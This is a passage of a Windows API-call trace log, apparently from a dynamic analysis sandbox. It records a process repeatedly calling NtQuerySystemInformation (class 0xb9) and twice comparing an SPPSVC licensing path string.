SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0297.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0297.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0297.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x28, ResultLength=0x0) [0297.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0297.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0297.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ece0, Length=0x50, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x50, ResultLength=0x0) [0297.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0297.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0297.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x28, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0297.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0297.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e900, Length=0x20, ResultLength=0x0) [0297.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x38, ResultLength=0x0) [0297.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x20, ResultLength=0x0) [0297.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x20, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x28, ResultLength=0x0) [0297.686] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0297.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0297.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0297.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0297.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x28, ResultLength=0x0) [0297.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0297.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0297.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0297.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0297.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x28, ResultLength=0x0) [0297.729] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0297.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x50, ResultLength=0x0) [0297.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0297.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0297.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaf0, Length=0x28, ResultLength=0x0) [0297.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x28, ResultLength=0x0) [0297.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, ResultLength=0x0) [0297.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x28, 